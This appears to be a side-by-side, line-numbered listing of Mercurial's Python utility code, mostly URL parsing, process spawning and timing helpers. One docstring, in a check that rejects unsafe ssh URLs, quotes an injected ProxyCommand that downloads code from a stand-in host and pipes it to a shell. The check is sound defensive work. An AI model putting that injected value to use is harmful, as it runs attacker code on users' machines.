2564 terminated = set()
2563 terminated = set()
2565 def handler(signum, frame):
2564 def handler(signum, frame):
2566 terminated.add(os.wait())
2565 terminated.add(os.wait())
2567 prevhandler = None
2566 prevhandler = None
2568 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2567 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2569 if SIGCHLD is not None:
2568 if SIGCHLD is not None:
2570 prevhandler = signal.signal(SIGCHLD, handler)
2569 prevhandler = signal.signal(SIGCHLD, handler)
2571 try:
2570 try:
2572 pid = spawndetached(args)
2571 pid = spawndetached(args)
2573 while not condfn():
2572 while not condfn():
2574 if ((pid in terminated or not testpid(pid))
2573 if ((pid in terminated or not testpid(pid))
2575 and not condfn()):
2574 and not condfn()):
2576 return -1
2575 return -1
2577 time.sleep(0.1)
2576 time.sleep(0.1)
2578 return pid
2577 return pid
2579 finally:
2578 finally:
2580 if prevhandler is not None:
2579 if prevhandler is not None:
2581 signal.signal(signal.SIGCHLD, prevhandler)
2580 signal.signal(signal.SIGCHLD, prevhandler)
2582
2581
2583 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2584 """Return the result of interpolating items in the mapping into string s.
2583 """Return the result of interpolating items in the mapping into string s.
2585
2584
2586 prefix is a single character string, or a two character string with
2585 prefix is a single character string, or a two character string with
2587 a backslash as the first character if the prefix needs to be escaped in
2586 a backslash as the first character if the prefix needs to be escaped in
2588 a regular expression.
2587 a regular expression.
2589
2588
2590 fn is an optional function that will be applied to the replacement text
2589 fn is an optional function that will be applied to the replacement text
2591 just before replacement.
2590 just before replacement.
2592
2591
2593 escape_prefix is an optional flag that allows using doubled prefix for
2592 escape_prefix is an optional flag that allows using doubled prefix for
2594 its escaping.
2593 its escaping.
2595 """
2594 """
2596 fn = fn or (lambda s: s)
2595 fn = fn or (lambda s: s)
2597 patterns = '|'.join(mapping.keys())
2596 patterns = '|'.join(mapping.keys())
2598 if escape_prefix:
2597 if escape_prefix:
2599 patterns += '|' + prefix
2598 patterns += '|' + prefix
2600 if len(prefix) > 1:
2599 if len(prefix) > 1:
2601 prefix_char = prefix[1:]
2600 prefix_char = prefix[1:]
2602 else:
2601 else:
2603 prefix_char = prefix
2602 prefix_char = prefix
2604 mapping[prefix_char] = prefix_char
2603 mapping[prefix_char] = prefix_char
2605 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2604 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2606 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2607
2606
2608 def getport(port):
2607 def getport(port):
2609 """Return the port for a given network service.
2608 """Return the port for a given network service.
2610
2609
2611 If port is an integer, it's returned as is. If it's a string, it's
2610 If port is an integer, it's returned as is. If it's a string, it's
2612 looked up using socket.getservbyname(). If there's no matching
2611 looked up using socket.getservbyname(). If there's no matching
2613 service, error.Abort is raised.
2612 service, error.Abort is raised.
2614 """
2613 """
2615 try:
2614 try:
2616 return int(port)
2615 return int(port)
2617 except ValueError:
2616 except ValueError:
2618 pass
2617 pass
2619
2618
2620 try:
2619 try:
2621 return socket.getservbyname(port)
2620 return socket.getservbyname(port)
2622 except socket.error:
2621 except socket.error:
2623 raise Abort(_("no port number associated with service '%s'") % port)
2622 raise Abort(_("no port number associated with service '%s'") % port)
2624
2623
2625 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2624 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2626 '0': False, 'no': False, 'false': False, 'off': False,
2625 '0': False, 'no': False, 'false': False, 'off': False,
2627 'never': False}
2626 'never': False}
2628
2627
2629 def parsebool(s):
2628 def parsebool(s):
2630 """Parse s into a boolean.
2629 """Parse s into a boolean.
2631
2630
2632 If s is not a valid boolean, returns None.
2631 If s is not a valid boolean, returns None.
2633 """
2632 """
2634 return _booleans.get(s.lower(), None)
2633 return _booleans.get(s.lower(), None)
2635
2634
2636 _hextochr = dict((a + b, chr(int(a + b, 16)))
2635 _hextochr = dict((a + b, chr(int(a + b, 16)))
2637 for a in string.hexdigits for b in string.hexdigits)
2636 for a in string.hexdigits for b in string.hexdigits)
2638
2637
2639 class url(object):
2638 class url(object):
2640 r"""Reliable URL parser.
2639 r"""Reliable URL parser.
2641
2640
2642 This parses URLs and provides attributes for the following
2641 This parses URLs and provides attributes for the following
2643 components:
2642 components:
2644
2643
2645 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2644 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2646
2645
2647 Missing components are set to None. The only exception is
2646 Missing components are set to None. The only exception is
2648 fragment, which is set to '' if present but empty.
2647 fragment, which is set to '' if present but empty.
2649
2648
2650 If parsefragment is False, fragment is included in query. If
2649 If parsefragment is False, fragment is included in query. If
2651 parsequery is False, query is included in path. If both are
2650 parsequery is False, query is included in path. If both are
2652 False, both fragment and query are included in path.
2651 False, both fragment and query are included in path.
2653
2652
2654 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2653 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2655
2654
2656 Note that for backward compatibility reasons, bundle URLs do not
2655 Note that for backward compatibility reasons, bundle URLs do not
2657 take host names. That means 'bundle://../' has a path of '../'.
2656 take host names. That means 'bundle://../' has a path of '../'.
2658
2657
2659 Examples:
2658 Examples:
2660
2659
2661 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2660 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2662 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2661 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2663 >>> url('ssh://[::1]:2200//home/joe/repo')
2662 >>> url('ssh://[::1]:2200//home/joe/repo')
2664 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2663 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2665 >>> url('file:///home/joe/repo')
2664 >>> url('file:///home/joe/repo')
2666 <url scheme: 'file', path: '/home/joe/repo'>
2665 <url scheme: 'file', path: '/home/joe/repo'>
2667 >>> url('file:///c:/temp/foo/')
2666 >>> url('file:///c:/temp/foo/')
2668 <url scheme: 'file', path: 'c:/temp/foo/'>
2667 <url scheme: 'file', path: 'c:/temp/foo/'>
2669 >>> url('bundle:foo')
2668 >>> url('bundle:foo')
2670 <url scheme: 'bundle', path: 'foo'>
2669 <url scheme: 'bundle', path: 'foo'>
2671 >>> url('bundle://../foo')
2670 >>> url('bundle://../foo')
2672 <url scheme: 'bundle', path: '../foo'>
2671 <url scheme: 'bundle', path: '../foo'>
2673 >>> url(r'c:\foo\bar')
2672 >>> url(r'c:\foo\bar')
2674 <url path: 'c:\\foo\\bar'>
2673 <url path: 'c:\\foo\\bar'>
2675 >>> url(r'\\blah\blah\blah')
2674 >>> url(r'\\blah\blah\blah')
2676 <url path: '\\\\blah\\blah\\blah'>
2675 <url path: '\\\\blah\\blah\\blah'>
2677 >>> url(r'\\blah\blah\blah#baz')
2676 >>> url(r'\\blah\blah\blah#baz')
2678 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2677 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2679 >>> url(r'file:///C:\users\me')
2678 >>> url(r'file:///C:\users\me')
2680 <url scheme: 'file', path: 'C:\\users\\me'>
2679 <url scheme: 'file', path: 'C:\\users\\me'>
2681
2680
2682 Authentication credentials:
2681 Authentication credentials:
2683
2682
2684 >>> url('ssh://joe:xyz@x/repo')
2683 >>> url('ssh://joe:xyz@x/repo')
2685 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2684 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2686 >>> url('ssh://joe@x/repo')
2685 >>> url('ssh://joe@x/repo')
2687 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2686 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2688
2687
2689 Query strings and fragments:
2688 Query strings and fragments:
2690
2689
2691 >>> url('http://host/a?b#c')
2690 >>> url('http://host/a?b#c')
2692 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2691 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2693 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2692 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2694 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2693 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2695
2694
2696 Empty path:
2695 Empty path:
2697
2696
2698 >>> url('')
2697 >>> url('')
2699 <url path: ''>
2698 <url path: ''>
2700 >>> url('#a')
2699 >>> url('#a')
2701 <url path: '', fragment: 'a'>
2700 <url path: '', fragment: 'a'>
2702 >>> url('http://host/')
2701 >>> url('http://host/')
2703 <url scheme: 'http', host: 'host', path: ''>
2702 <url scheme: 'http', host: 'host', path: ''>
2704 >>> url('http://host/#a')
2703 >>> url('http://host/#a')
2705 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2704 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2706
2705
2707 Only scheme:
2706 Only scheme:
2708
2707
2709 >>> url('http:')
2708 >>> url('http:')
2710 <url scheme: 'http'>
2709 <url scheme: 'http'>
2711 """
2710 """
2712
2711
2713 _safechars = "!~*'()+"
2712 _safechars = "!~*'()+"
2714 _safepchars = "/!~*'()+:\\"
2713 _safepchars = "/!~*'()+:\\"
2715 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2714 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2716
2715
2717 def __init__(self, path, parsequery=True, parsefragment=True):
2716 def __init__(self, path, parsequery=True, parsefragment=True):
2718 # We slowly chomp away at path until we have only the path left
2717 # We slowly chomp away at path until we have only the path left
2719 self.scheme = self.user = self.passwd = self.host = None
2718 self.scheme = self.user = self.passwd = self.host = None
2720 self.port = self.path = self.query = self.fragment = None
2719 self.port = self.path = self.query = self.fragment = None
2721 self._localpath = True
2720 self._localpath = True
2722 self._hostport = ''
2721 self._hostport = ''
2723 self._origpath = path
2722 self._origpath = path
2724
2723
2725 if parsefragment and '#' in path:
2724 if parsefragment and '#' in path:
2726 path, self.fragment = path.split('#', 1)
2725 path, self.fragment = path.split('#', 1)
2727
2726
2728 # special case for Windows drive letters and UNC paths
2727 # special case for Windows drive letters and UNC paths
2729 if hasdriveletter(path) or path.startswith('\\\\'):
2728 if hasdriveletter(path) or path.startswith('\\\\'):
2730 self.path = path
2729 self.path = path
2731 return
2730 return
2732
2731
2733 # For compatibility reasons, we can't handle bundle paths as
2732 # For compatibility reasons, we can't handle bundle paths as
2734 # normal URLS
2733 # normal URLS
2735 if path.startswith('bundle:'):
2734 if path.startswith('bundle:'):
2736 self.scheme = 'bundle'
2735 self.scheme = 'bundle'
2737 path = path[7:]
2736 path = path[7:]
2738 if path.startswith('//'):
2737 if path.startswith('//'):
2739 path = path[2:]
2738 path = path[2:]
2740 self.path = path
2739 self.path = path
2741 return
2740 return
2742
2741
2743 if self._matchscheme(path):
2742 if self._matchscheme(path):
2744 parts = path.split(':', 1)
2743 parts = path.split(':', 1)
2745 if parts[0]:
2744 if parts[0]:
2746 self.scheme, path = parts
2745 self.scheme, path = parts
2747 self._localpath = False
2746 self._localpath = False
2748
2747
2749 if not path:
2748 if not path:
2750 path = None
2749 path = None
2751 if self._localpath:
2750 if self._localpath:
2752 self.path = ''
2751 self.path = ''
2753 return
2752 return
2754 else:
2753 else:
2755 if self._localpath:
2754 if self._localpath:
2756 self.path = path
2755 self.path = path
2757 return
2756 return
2758
2757
2759 if parsequery and '?' in path:
2758 if parsequery and '?' in path:
2760 path, self.query = path.split('?', 1)
2759 path, self.query = path.split('?', 1)
2761 if not path:
2760 if not path:
2762 path = None
2761 path = None
2763 if not self.query:
2762 if not self.query:
2764 self.query = None
2763 self.query = None
2765
2764
2766 # // is required to specify a host/authority
2765 # // is required to specify a host/authority
2767 if path and path.startswith('//'):
2766 if path and path.startswith('//'):
2768 parts = path[2:].split('/', 1)
2767 parts = path[2:].split('/', 1)
2769 if len(parts) > 1:
2768 if len(parts) > 1:
2770 self.host, path = parts
2769 self.host, path = parts
2771 else:
2770 else:
2772 self.host = parts[0]
2771 self.host = parts[0]
2773 path = None
2772 path = None
2774 if not self.host:
2773 if not self.host:
2775 self.host = None
2774 self.host = None
2776 # path of file:///d is /d
2775 # path of file:///d is /d
2777 # path of file:///d:/ is d:/, not /d:/
2776 # path of file:///d:/ is d:/, not /d:/
2778 if path and not hasdriveletter(path):
2777 if path and not hasdriveletter(path):
2779 path = '/' + path
2778 path = '/' + path
2780
2779
2781 if self.host and '@' in self.host:
2780 if self.host and '@' in self.host:
2782 self.user, self.host = self.host.rsplit('@', 1)
2781 self.user, self.host = self.host.rsplit('@', 1)
2783 if ':' in self.user:
2782 if ':' in self.user:
2784 self.user, self.passwd = self.user.split(':', 1)
2783 self.user, self.passwd = self.user.split(':', 1)
2785 if not self.host:
2784 if not self.host:
2786 self.host = None
2785 self.host = None
2787
2786
2788 # Don't split on colons in IPv6 addresses without ports
2787 # Don't split on colons in IPv6 addresses without ports
2789 if (self.host and ':' in self.host and
2788 if (self.host and ':' in self.host and
2790 not (self.host.startswith('[') and self.host.endswith(']'))):
2789 not (self.host.startswith('[') and self.host.endswith(']'))):
2791 self._hostport = self.host
2790 self._hostport = self.host
2792 self.host, self.port = self.host.rsplit(':', 1)
2791 self.host, self.port = self.host.rsplit(':', 1)
2793 if not self.host:
2792 if not self.host:
2794 self.host = None
2793 self.host = None
2795
2794
2796 if (self.host and self.scheme == 'file' and
2795 if (self.host and self.scheme == 'file' and
2797 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2796 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2798 raise Abort(_('file:// URLs can only refer to localhost'))
2797 raise Abort(_('file:// URLs can only refer to localhost'))
2799
2798
2800 self.path = path
2799 self.path = path
2801
2800
2802 # leave the query string escaped
2801 # leave the query string escaped
2803 for a in ('user', 'passwd', 'host', 'port',
2802 for a in ('user', 'passwd', 'host', 'port',
2804 'path', 'fragment'):
2803 'path', 'fragment'):
2805 v = getattr(self, a)
2804 v = getattr(self, a)
2806 if v is not None:
2805 if v is not None:
2807 setattr(self, a, urlreq.unquote(v))
2806 setattr(self, a, urlreq.unquote(v))
2808
2807
2809 def __repr__(self):
2808 def __repr__(self):
2810 attrs = []
2809 attrs = []
2811 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2810 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2812 'query', 'fragment'):
2811 'query', 'fragment'):
2813 v = getattr(self, a)
2812 v = getattr(self, a)
2814 if v is not None:
2813 if v is not None:
2815 attrs.append('%s: %r' % (a, v))
2814 attrs.append('%s: %r' % (a, v))
2816 return '<url %s>' % ', '.join(attrs)
2815 return '<url %s>' % ', '.join(attrs)
2817
2816
2818 def __bytes__(self):
2817 def __bytes__(self):
2819 r"""Join the URL's components back into a URL string.
2818 r"""Join the URL's components back into a URL string.
2820
2819
2821 Examples:
2820 Examples:
2822
2821
2823 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2822 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2824 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2823 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2825 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2824 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2826 'http://user:pw@host:80/?foo=bar&baz=42'
2825 'http://user:pw@host:80/?foo=bar&baz=42'
2827 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2826 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2828 'http://user:pw@host:80/?foo=bar%3dbaz'
2827 'http://user:pw@host:80/?foo=bar%3dbaz'
2829 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2828 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2830 'ssh://user:pw@[::1]:2200//home/joe#'
2829 'ssh://user:pw@[::1]:2200//home/joe#'
2831 >>> str(url('http://localhost:80//'))
2830 >>> str(url('http://localhost:80//'))
2832 'http://localhost:80//'
2831 'http://localhost:80//'
2833 >>> str(url('http://localhost:80/'))
2832 >>> str(url('http://localhost:80/'))
2834 'http://localhost:80/'
2833 'http://localhost:80/'
2835 >>> str(url('http://localhost:80'))
2834 >>> str(url('http://localhost:80'))
2836 'http://localhost:80/'
2835 'http://localhost:80/'
2837 >>> str(url('bundle:foo'))
2836 >>> str(url('bundle:foo'))
2838 'bundle:foo'
2837 'bundle:foo'
2839 >>> str(url('bundle://../foo'))
2838 >>> str(url('bundle://../foo'))
2840 'bundle:../foo'
2839 'bundle:../foo'
2841 >>> str(url('path'))
2840 >>> str(url('path'))
2842 'path'
2841 'path'
2843 >>> str(url('file:///tmp/foo/bar'))
2842 >>> str(url('file:///tmp/foo/bar'))
2844 'file:///tmp/foo/bar'
2843 'file:///tmp/foo/bar'
2845 >>> str(url('file:///c:/tmp/foo/bar'))
2844 >>> str(url('file:///c:/tmp/foo/bar'))
2846 'file:///c:/tmp/foo/bar'
2845 'file:///c:/tmp/foo/bar'
2847 >>> print url(r'bundle:foo\bar')
2846 >>> print url(r'bundle:foo\bar')
2848 bundle:foo\bar
2847 bundle:foo\bar
2849 >>> print url(r'file:///D:\data\hg')
2848 >>> print url(r'file:///D:\data\hg')
2850 file:///D:\data\hg
2849 file:///D:\data\hg
2851 """
2850 """
2852 if self._localpath:
2851 if self._localpath:
2853 s = self.path
2852 s = self.path
2854 if self.scheme == 'bundle':
2853 if self.scheme == 'bundle':
2855 s = 'bundle:' + s
2854 s = 'bundle:' + s
2856 if self.fragment:
2855 if self.fragment:
2857 s += '#' + self.fragment
2856 s += '#' + self.fragment
2858 return s
2857 return s
2859
2858
2860 s = self.scheme + ':'
2859 s = self.scheme + ':'
2861 if self.user or self.passwd or self.host:
2860 if self.user or self.passwd or self.host:
2862 s += '//'
2861 s += '//'
2863 elif self.scheme and (not self.path or self.path.startswith('/')
2862 elif self.scheme and (not self.path or self.path.startswith('/')
2864 or hasdriveletter(self.path)):
2863 or hasdriveletter(self.path)):
2865 s += '//'
2864 s += '//'
2866 if hasdriveletter(self.path):
2865 if hasdriveletter(self.path):
2867 s += '/'
2866 s += '/'
2868 if self.user:
2867 if self.user:
2869 s += urlreq.quote(self.user, safe=self._safechars)
2868 s += urlreq.quote(self.user, safe=self._safechars)
2870 if self.passwd:
2869 if self.passwd:
2871 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2870 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2872 if self.user or self.passwd:
2871 if self.user or self.passwd:
2873 s += '@'
2872 s += '@'
2874 if self.host:
2873 if self.host:
2875 if not (self.host.startswith('[') and self.host.endswith(']')):
2874 if not (self.host.startswith('[') and self.host.endswith(']')):
2876 s += urlreq.quote(self.host)
2875 s += urlreq.quote(self.host)
2877 else:
2876 else:
2878 s += self.host
2877 s += self.host
2879 if self.port:
2878 if self.port:
2880 s += ':' + urlreq.quote(self.port)
2879 s += ':' + urlreq.quote(self.port)
2881 if self.host:
2880 if self.host:
2882 s += '/'
2881 s += '/'
2883 if self.path:
2882 if self.path:
2884 # TODO: similar to the query string, we should not unescape the
2883 # TODO: similar to the query string, we should not unescape the
2885 # path when we store it, the path might contain '%2f' = '/',
2884 # path when we store it, the path might contain '%2f' = '/',
2886 # which we should *not* escape.
2885 # which we should *not* escape.
2887 s += urlreq.quote(self.path, safe=self._safepchars)
2886 s += urlreq.quote(self.path, safe=self._safepchars)
2888 if self.query:
2887 if self.query:
2889 # we store the query in escaped form.
2888 # we store the query in escaped form.
2890 s += '?' + self.query
2889 s += '?' + self.query
2891 if self.fragment is not None:
2890 if self.fragment is not None:
2892 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2891 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2893 return s
2892 return s
2894
2893
2895 __str__ = encoding.strmethod(__bytes__)
2894 __str__ = encoding.strmethod(__bytes__)
2896
2895
2897 def authinfo(self):
2896 def authinfo(self):
2898 user, passwd = self.user, self.passwd
2897 user, passwd = self.user, self.passwd
2899 try:
2898 try:
2900 self.user, self.passwd = None, None
2899 self.user, self.passwd = None, None
2901 s = bytes(self)
2900 s = bytes(self)
2902 finally:
2901 finally:
2903 self.user, self.passwd = user, passwd
2902 self.user, self.passwd = user, passwd
2904 if not self.user:
2903 if not self.user:
2905 return (s, None)
2904 return (s, None)
2906 # authinfo[1] is passed to urllib2 password manager, and its
2905 # authinfo[1] is passed to urllib2 password manager, and its
2907 # URIs must not contain credentials. The host is passed in the
2906 # URIs must not contain credentials. The host is passed in the
2908 # URIs list because Python < 2.4.3 uses only that to search for
2907 # URIs list because Python < 2.4.3 uses only that to search for
2909 # a password.
2908 # a password.
2910 return (s, (None, (s, self.host),
2909 return (s, (None, (s, self.host),
2911 self.user, self.passwd or ''))
2910 self.user, self.passwd or ''))
2912
2911
2913 def isabs(self):
2912 def isabs(self):
2914 if self.scheme and self.scheme != 'file':
2913 if self.scheme and self.scheme != 'file':
2915 return True # remote URL
2914 return True # remote URL
2916 if hasdriveletter(self.path):
2915 if hasdriveletter(self.path):
2917 return True # absolute for our purposes - can't be joined()
2916 return True # absolute for our purposes - can't be joined()
2918 if self.path.startswith(br'\\'):
2917 if self.path.startswith(br'\\'):
2919 return True # Windows UNC path
2918 return True # Windows UNC path
2920 if self.path.startswith('/'):
2919 if self.path.startswith('/'):
2921 return True # POSIX-style
2920 return True # POSIX-style
2922 return False
2921 return False
2923
2922
2924 def localpath(self):
2923 def localpath(self):
2925 if self.scheme == 'file' or self.scheme == 'bundle':
2924 if self.scheme == 'file' or self.scheme == 'bundle':
2926 path = self.path or '/'
2925 path = self.path or '/'
2927 # For Windows, we need to promote hosts containing drive
2926 # For Windows, we need to promote hosts containing drive
2928 # letters to paths with drive letters.
2927 # letters to paths with drive letters.
2929 if hasdriveletter(self._hostport):
2928 if hasdriveletter(self._hostport):
2930 path = self._hostport + '/' + self.path
2929 path = self._hostport + '/' + self.path
2931 elif (self.host is not None and self.path
2930 elif (self.host is not None and self.path
2932 and not hasdriveletter(path)):
2931 and not hasdriveletter(path)):
2933 path = '/' + path
2932 path = '/' + path
2934 return path
2933 return path
2935 return self._origpath
2934 return self._origpath
2936
2935
2937 def islocal(self):
2936 def islocal(self):
2938 '''whether localpath will return something that posixfile can open'''
2937 '''whether localpath will return something that posixfile can open'''
2939 return (not self.scheme or self.scheme == 'file'
2938 return (not self.scheme or self.scheme == 'file'
2940 or self.scheme == 'bundle')
2939 or self.scheme == 'bundle')
2941
2940
2942 def hasscheme(path):
2941 def hasscheme(path):
2943 return bool(url(path).scheme)
2942 return bool(url(path).scheme)
2944
2943
2945 def hasdriveletter(path):
2944 def hasdriveletter(path):
2946 return path and path[1:2] == ':' and path[0:1].isalpha()
2945 return path and path[1:2] == ':' and path[0:1].isalpha()
2947
2946
2948 def urllocalpath(path):
2947 def urllocalpath(path):
2949 return url(path, parsequery=False, parsefragment=False).localpath()
2948 return url(path, parsequery=False, parsefragment=False).localpath()
2950
2949
2951 def checksafessh(path):
2950 def checksafessh(path):
2952 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2951 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2953
2952
2954 This is a sanity check for ssh urls. ssh will parse the first item as
2953 This is a sanity check for ssh urls. ssh will parse the first item as
2955 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2954 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2956 Let's prevent these potentially exploited urls entirely and warn the
2955 Let's prevent these potentially exploited urls entirely and warn the
2957 user.
2956 user.
2958
2957
2959 Raises an error.Abort when the url is unsafe.
2958 Raises an error.Abort when the url is unsafe.
2960 """
2959 """
2961 path = urlreq.unquote(path)
2960 path = urlreq.unquote(path)
2962 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2961 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2963 raise error.Abort(_('potentially unsafe url: %r') %
2962 raise error.Abort(_('potentially unsafe url: %r') %
2964 (path,))
2963 (path,))
2965
2964
2966 def hidepassword(u):
2965 def hidepassword(u):
2967 '''hide user credential in a url string'''
2966 '''hide user credential in a url string'''
2968 u = url(u)
2967 u = url(u)
2969 if u.passwd:
2968 if u.passwd:
2970 u.passwd = '***'
2969 u.passwd = '***'
2971 return bytes(u)
2970 return bytes(u)
2972
2971
2973 def removeauth(u):
2972 def removeauth(u):
2974 '''remove all authentication information from a url string'''
2973 '''remove all authentication information from a url string'''
2975 u = url(u)
2974 u = url(u)
2976 u.user = u.passwd = None
2975 u.user = u.passwd = None
2977 return str(u)
2976 return str(u)
2978
2977
2979 timecount = unitcountfn(
2978 timecount = unitcountfn(
2980 (1, 1e3, _('%.0f s')),
2979 (1, 1e3, _('%.0f s')),
2981 (100, 1, _('%.1f s')),
2980 (100, 1, _('%.1f s')),
2982 (10, 1, _('%.2f s')),
2981 (10, 1, _('%.2f s')),
2983 (1, 1, _('%.3f s')),
2982 (1, 1, _('%.3f s')),
2984 (100, 0.001, _('%.1f ms')),
2983 (100, 0.001, _('%.1f ms')),
2985 (10, 0.001, _('%.2f ms')),
2984 (10, 0.001, _('%.2f ms')),
2986 (1, 0.001, _('%.3f ms')),
2985 (1, 0.001, _('%.3f ms')),
2987 (100, 0.000001, _('%.1f us')),
2986 (100, 0.000001, _('%.1f us')),
2988 (10, 0.000001, _('%.2f us')),
2987 (10, 0.000001, _('%.2f us')),
2989 (1, 0.000001, _('%.3f us')),
2988 (1, 0.000001, _('%.3f us')),
2990 (100, 0.000000001, _('%.1f ns')),
2989 (100, 0.000000001, _('%.1f ns')),
2991 (10, 0.000000001, _('%.2f ns')),
2990 (10, 0.000000001, _('%.2f ns')),
2992 (1, 0.000000001, _('%.3f ns')),
2991 (1, 0.000000001, _('%.3f ns')),
2993 )
2992 )
2994
2993
2995 _timenesting = [0]
2994 _timenesting = [0]
2996
2995
2997 def timed(func):
2996 def timed(func):
2998 '''Report the execution time of a function call to stderr.
2997 '''Report the execution time of a function call to stderr.
2999
2998
3000 During development, use as a decorator when you need to measure
2999 During development, use as a decorator when you need to measure
3001 the cost of a function, e.g. as follows:
3000 the cost of a function, e.g. as follows:
3002
3001
3003 @util.timed
3002 @util.timed
3004 def foo(a, b, c):
3003 def foo(a, b, c):
3005 pass
3004 pass
3006 '''
3005 '''
3007
3006
3008 def wrapper(*args, **kwargs):
3007 def wrapper(*args, **kwargs):
3009 start = timer()
3008 start = timer()
3010 indent = 2
3009 indent = 2
3011 _timenesting[0] += indent
3010 _timenesting[0] += indent
3012 try:
3011 try:
3013 return func(*args, **kwargs)
3012 return func(*args, **kwargs)
3014 finally:
3013 finally:
3015 elapsed = timer() - start
3014 elapsed = timer() - start
3016 _timenesting[0] -= indent
3015 _timenesting[0] -= indent
3017 stderr.write('%s%s: %s\n' %
3016 stderr.write('%s%s: %s\n' %
3018 (' ' * _timenesting[0], func.__name__,
3017 (' ' * _timenesting[0], func.__name__,
3019 timecount(elapsed)))
3018 timecount(elapsed)))
3020 return wrapper
3019 return wrapper
3021
3020
3022 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3021 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3023 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3022 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3024
3023
3025 def sizetoint(s):
3024 def sizetoint(s):
3026 '''Convert a space specifier to a byte count.
3025 '''Convert a space specifier to a byte count.
3027
3026
3028 >>> sizetoint('30')
3027 >>> sizetoint('30')
3029 30
3028 30
3030 >>> sizetoint('2.2kb')
3029 >>> sizetoint('2.2kb')
3031 2252
3030 2252
3032 >>> sizetoint('6M')
3031 >>> sizetoint('6M')
3033 6291456
3032 6291456
3034 '''
3033 '''
3035 t = s.strip().lower()
3034 t = s.strip().lower()
3036 try:
3035 try:
3037 for k, u in _sizeunits:
3036 for k, u in _sizeunits:
3038 if t.endswith(k):
3037 if t.endswith(k):
3039 return int(float(t[:-len(k)]) * u)
3038 return int(float(t[:-len(k)]) * u)
3040 return int(t)
3039 return int(t)
3041 except ValueError:
3040 except ValueError:
3042 raise error.ParseError(_("couldn't parse size: %s") % s)
3041 raise error.ParseError(_("couldn't parse size: %s") % s)
3043
3042
3044 class hooks(object):
3043 class hooks(object):
3045 '''A collection of hook functions that can be used to extend a
3044 '''A collection of hook functions that can be used to extend a
3046 function's behavior. Hooks are called in lexicographic order,
3045 function's behavior. Hooks are called in lexicographic order,
3047 based on the names of their sources.'''
3046 based on the names of their sources.'''
3048
3047
3049 def __init__(self):
3048 def __init__(self):
3050 self._hooks = []
3049 self._hooks = []
3051
3050
3052 def add(self, source, hook):
3051 def add(self, source, hook):
3053 self._hooks.append((source, hook))
3052 self._hooks.append((source, hook))
3054
3053
3055 def __call__(self, *args):
3054 def __call__(self, *args):
3056 self._hooks.sort(key=lambda x: x[0])
3055 self._hooks.sort(key=lambda x: x[0])
3057 results = []
3056 results = []
3058 for source, hook in self._hooks:
3057 for source, hook in self._hooks:
3059 results.append(hook(*args))
3058 results.append(hook(*args))
3060 return results
3059 return results
3061
3060
